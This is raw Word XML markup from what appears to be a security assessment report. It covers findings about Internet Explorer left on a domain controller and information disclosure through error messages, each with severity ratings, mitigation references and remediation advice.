          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="128FCB60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>een deprecated</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6BB3D9E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by</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Microsoft and has stopped receiving all updates as of </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2022</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="47435C74">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20668EDE" w14:textId="39C857D2">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B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="5510ABF6" w14:textId="55B3C25A">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3883134" w:rsidP="0D325B6E" w:rsidRDefault="63883134" w14:paraId="324B7DC5" w14:textId="36120CCD">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3883134">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet Explorer is an outdated and unsupported Microsoft program installed</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FBD2B57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FBD2B57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FBD2B57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. While no current critical vulnerabilities are known for Internet </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="272F7C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Explorer,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FBD2B57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> any newly discovered exploits will not receive security patches and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A2C35D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">would leave the machine open to attacks. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FBD2B57">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2CAEE3DD" w14:textId="7EC06531">
      <w:pPr>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7B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="7850E1A2" w14:textId="62961C5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7B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="6601DA5D" w14:textId="134C72D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0D325B6E" w:rsidR="3945A2E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Browse installed programs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3945A2E7" w:rsidP="0D325B6E" w:rsidRDefault="3945A2E7" w14:paraId="11B69AE6" w14:textId="0360C51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3945A2E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: See Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="79105534" w14:textId="678ABDD9">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7B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="121C40FB" w14:textId="422BA7F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7B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="760B971E" w14:textId="0A40ED4F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:hanging="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7B91E9D1">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31DFB18" w:rsidP="0D325B6E" w:rsidRDefault="231DFB18" w14:paraId="044D921B" w14:textId="6DC58770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>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231DFB18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uninstall Internet Explorer on all Windows machines to reduce</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="676C3FE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="231DFB18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="231DFB18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>surface</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="328DAE96">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the network</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="231DFB1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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4C98B7F5" w14:textId="3CB33069">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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7B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="2EBFB20F" w14:textId="66E7FB82">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7B91E9D1">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4142CAC" w:rsidP="0D325B6E" w:rsidRDefault="64142CAC" w14:paraId="7BCE00A5" w14:textId="5DD35331">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R71f4de4490e44280">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="64142CAC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Microsoft - Internet Explorer End-Of-Life</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="64142CAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4402EBC9" w14:textId="6BCF4043">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="01C7FDB4" w:rsidP="0D325B6E" w:rsidRDefault="01C7FDB4" w14:paraId="3F417453" w14:textId="67208D31">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01C7FDB4">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">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I1: Information Disclosure Through Error Message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30"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="2313"/>
        <w:gridCol w:w="4365"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="14F09880">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="333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2E51C848" w14:textId="3B6B86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313"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FC3B53E" w14:textId="248E224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B957D26" w14:textId="3BE26A8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2584A532">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E22E585" w14:textId="55449E5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3E537FB2" w14:textId="16F0C5B2">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Informationa</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="3A9E5A9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2313"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263A6EED" w14:textId="2AF23E9D">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5E4D92A7" w14:textId="5787AFE6">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2D11BA39">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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966ABA0" w14:textId="1229884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67145F2B" w14:textId="07A7819E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FF0000"/>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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2313" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FDF3C95"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E6597BA"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="166E3B3E">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="333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4C4932B" w14:textId="256F4A7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678"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7905A31B" w14:textId="32C935BB">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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="62692BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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A33D319" w14:textId="206E2B0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219CBD2" w14:textId="3C5DE3CF">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678"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0DBAF21" w14:textId="47F627BF">
            <w:pPr>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trike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2209BDAC">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4434DB98"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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CB681E6" w14:textId="4C88E04E">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678"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A839D76" w14:textId="767A617A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rdaa8653233744c45">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1054 – Application Isolation and Sandboxing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4050B8C4" w14:textId="3D92B26B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R2aff083172c647dc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051 - Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4E34081D">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3330"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9780892" w14:textId="7AB28C2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678"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3FA1FF53" w14:textId="1644FC8C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3EDE6D08" w14:textId="60EE5FE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FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="72EC7EBB" w14:textId="3C7E4EDE">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6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="35EDC323" w14:textId="5A1F5101">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The web application reveals sensitive information from its error messages revealing </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">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This information should not be </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="010AB3F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>publicly</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exposed as it provides attackers with information that could be used to do </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1DADF60A" w14:textId="68C55B7C">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FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="121D757E" w14:textId="6686A6E4">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FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="66FF235A" w14:textId="76636B68">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Exposing detailed error messages increases the application’s attack </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3DF12B48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>surface,</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and attackers can use this to perform targeted attacks on X. This can lead to unauthorized access, theft of sensitive information, and damage to APT’s reputation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="32050C42" w14:textId="3A569B3B">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FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="364B5BEF" w14:textId="17A3C20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6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="611DD17F" w14:textId="5BD77845">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Step 1: Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">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into the web application to trigger an error message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="61B8AB78" w14:textId="0BC50837">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Step 2: </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the error message returned by the application and see that it reveals </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">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p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3A6E748B" w14:textId="6128214D">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w:rsidR="6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="14ACE62B" w14:textId="4545B24F">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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remediation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="28CD529E" w14:textId="76052913">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6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="799702D9" w14:textId="2890B464">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>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Hide error messages and display generic error messages that do not reveal internal technical details.</w:t>
      </w:r>
    </w:p>
